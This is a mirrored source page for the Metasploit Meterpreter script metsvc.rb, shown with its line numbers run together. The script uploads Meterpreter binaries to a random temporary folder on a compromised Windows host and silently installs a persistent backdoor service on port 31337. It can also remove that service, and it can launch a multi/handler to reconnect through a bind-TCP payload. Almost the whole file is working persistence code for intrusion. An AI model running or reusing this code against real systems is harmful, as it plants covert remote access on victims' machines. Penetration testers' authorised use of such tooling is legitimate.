CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/scripts/meterpreter/metsvc.rb
Views: 1904
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678#9# Meterpreter script for installing the meterpreter service10#1112session = client1314#15# Options16#17opts = Rex::Parser::Arguments.new(18"-h" => [ false, "This help menu"],19"-r" => [ false, "Uninstall an existing Meterpreter service (files must be deleted manually)"],20"-A" => [ false, "Automatically start a matching exploit/multi/handler to connect to the service"]21)2223# Exec a command and return the results24def m_exec(session, cmd)25r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})26b = ""27while(d = r.channel.read)28b << d29end30r.channel.close31r.close32b33end3435#36# Default parameters37#3839based = File.join(Msf::Config.data_directory, "meterpreter")40rport = 3133741install = false42autoconn = false43remove = false44if client.platform == 'windows'4546#47# Option parsing48#49opts.parse(args) do |opt, idx, val|50case opt51when "-h"52print_line(opts.usage)53raise Rex::Script::Completed54when "-A"55autoconn = true56when "-r"57remove = true58end59end6061#62# Create the persistent VBS63#6465if(not remove)66print_status("Creating a meterpreter service on port #{rport}")67else68print_status("Removing the existing Meterpreter service")69end7071#72# Upload to the filesystem73#7475tempdir = client.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)7677print_status("Creating a temporary installation directory #{tempdir}...")78client.fs.dir.mkdir(tempdir)7980# Use an array of `from -> to` associations so that things81# such as metsrv can be copied from the appropriate location82# but named correctly on the target.83bins = {84'metsrv.x86.dll' => 'metsrv.dll',85'metsvc-server.exe' => nil,86'metsvc.exe' => nil87}8889bins.each do |from, to|90next if (from != "metsvc.exe" and remove)91to ||= from92print_status(" >> Uploading #{from}...")93fd = client.fs.file.new(tempdir + "\\" + to, "wb")94path = (from == 'metsrv.x86.dll') ? MetasploitPayloads.meterpreter_path('metsrv','x86.dll') : File.join(based, from)95fd.write(::File.read(path, ::File.size(path), mode: 'rb'))96fd.close97end9899#100# Execute the agent101#102if(not remove)103print_status("Starting the service...")104client.fs.dir.chdir(tempdir)105data = m_exec(client, "metsvc.exe install-service")106print_line("\t#{data}")107else108print_status("Stopping the service...")109client.fs.dir.chdir(tempdir)110data = m_exec(client, "metsvc.exe remove-service")111print_line("\t#{data}")112end113114if(remove)115m_exec(client, "cmd.exe /c del metsvc.exe")116end117118#119# Setup the exploit/multi/handler if requested120#121if(autoconn)122print_status("Trying to connect to the Meterpreter service at #{client.session_host}:#{rport}...")123mul = client.framework.exploits.create("multi/handler")124mul.datastore['WORKSPACE'] = client.workspace125mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"126mul.datastore['LPORT'] = rport127mul.datastore['RHOST'] = client.session_host128mul.datastore['ExitOnSession'] = false129mul.exploit_simple(130'Payload' => mul.datastore['PAYLOAD'],131'RunAsJob' => true132)133end134135else136print_error("This version of Meterpreter is not supported with this Script!")137raise Rex::Script::Completed138end139140141